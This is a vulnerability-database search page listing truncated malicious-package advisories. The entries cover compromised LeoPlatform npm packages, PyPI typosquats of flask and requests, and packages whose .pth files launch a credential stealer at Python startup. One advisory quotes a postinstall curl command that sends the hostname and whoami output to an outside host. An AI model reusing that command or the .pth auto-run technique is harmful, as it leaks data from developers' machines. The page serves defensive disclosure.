Lucene search
K

342 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.14 views

Malicious code in leo-config (npm)

The leo-config npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 11:4 p.m.14 views

Malicious code in leo-logger (npm)

The leo-logger npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...

6.1AI score
Exploits0References3
OSV
OSV
added 2026/06/24 11:4 p.m.10 views

MAL-2026-6423 Malicious code in leo-connector-elasticsearch (npm)

The leo-connector-elasticsearch npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

6AI score
Exploits0References3
OSV
OSV
added 2026/06/13 12:23 p.m.12 views

MAL-2026-5749 Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/08 7:53 a.m.13 views

Malicious code in rlask (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89a034f9ba4356799034d728884eccecf5c53779d85280556419cda38e671a30 The package name 'rlask' is a single-character edit of the popular 'flask' package. METADATA declares 'Maintainer-email: Pallets ', and entrypoints.t...

6AI score
Exploits0References10
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/08 7:52 a.m.15 views

Malicious code in rsquests (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e2041887c315474d0722cbf717e189ec1260e209c5f00da5ca3a52a60c6aebb2 The package name rsquests is a single-character insertion typo of the top-100 PyPI package requests. Package metadata and source are a verbatim copy ...

6AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.14 views

Malicious code in pyphetools (PyPI)

The package pyphetools version 0.9.120 contains a malicious .pth file pyphetools-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release page, then runs an obfuscate...

6AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.13 views

Malicious code in phenopacket-store-toolkit (PyPI)

The package phenopacket-store-toolkit version 0.1.7 contains a malicious .pth file phenopacketstoretoolkit-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release...

6AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.17 views

Malicious code in uprobe (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 82230ac4ef4464e9696491bf25cfabbd5cff78ab2256f4aa1a0d5ad7456218a8 The package installs uprobe-setup.pth, which Python auto-loads at every interpreter startup in any environment where the wheel is present. The.pth...

5.6AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.14 views

Malicious code in mrbios (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8d1c97dced5d8f917e2e9901e0ed99fb0034bfafb5a3d46ad47eeba76a883c57 The package installs mrbios-setup.pth into site-packages. Python auto-loads.pth files at every interpreter startup, so the contained payload runs...

6.2AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.15 views

Malicious code in ray-mcp-server (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 278bed91803e9a6775f966913bab49658f82a589e086ce8413782418a4bc4833 The package was found to contain malicious code or consuming dependency that contains malicious code Source: kam193...

6AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.13 views

Malicious code in ensmallen (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a05cd4ff9f8142405c5672f1ffa54d575165f6bc2b0f5324c9bfacf75e651de8 The package was found to contain malicious code or consuming dependency that contains malicious code Source: kam193...

6AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.14 views

Malicious code in executor-http (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cde4da7201fbc0dd3ae09240232f5767c2893e33977d6c8ee9071d15e79f0363 The package ships executorhttp-setup.pth, which Python auto-loads at interpreter start for any environment where the package is installed. The.pth fi...

5.7AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.16 views

Malicious code in pantheon-agents (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1ee06d7aabbdf76969119c2f986e18bbc7f0dcac59ae9cae4f7a04798f2d083d The package installs pantheonagents-setup.pth into site-packages, which Python auto-executes at every interpreter startup broader than import-time,...

5.7AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.24 views

Malicious code in mflux-streamlit (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9924feddaacd4b86934ddc7bdf8ff498921a80b34bf99a9136baa592fcc504b6 The package was found to contain malicious code or consuming dependency that contains malicious code Source: kam193...

6AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.21 views

Malicious code in spateo-release (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 21400e8510d0663de6c3a4454fe99d9200cb83ae8d1ecdc137c99f3668da4293 Versions 1.1.2 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed using B...

5.5AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.18 views

Malicious code in magique-ai (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4241e99d1053712e6909db44c939421695dff66556055a93058f9a55f8694929 The package was found to contain malicious code or consuming dependency that contains malicious code Source: kam193...

6AI score
Exploits0References6
OSV
OSV
added 2026/06/06 6:13 a.m.55 views

MAL-2026-5315 Malicious code in ensmallen (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a05cd4ff9f8142405c5672f1ffa54d575165f6bc2b0f5324c9bfacf75e651de8 The package was found to contain malicious code or consuming dependency that contains malicious code Source: kam193...

6.1AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/06 6:13 a.m.16 views

Malicious code in gpsea (PyPI)

The package gpsea version 0.9.14 contains a malicious .pth file gpsea-setup.pth that executes a Bun-based credential stealer on every Python startup via CPython's site.py exec mechanism. The payload downloads the Bun runtime from the official GitHub release page, then runs an obfuscated JavaScrip...

6AI score
Exploits0References7
OSV
OSV
added 2026/06/06 6:13 a.m.17 views

MAL-2026-5299 Malicious code in pantheon-agents (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1ee06d7aabbdf76969119c2f986e18bbc7f0dcac59ae9cae4f7a04798f2d083d The package installs pantheonagents-setup.pth into site-packages, which Python auto-executes at every interpreter startup broader than import-time,...

5.8AI score
Exploits0References6
Rows per page
Query Builder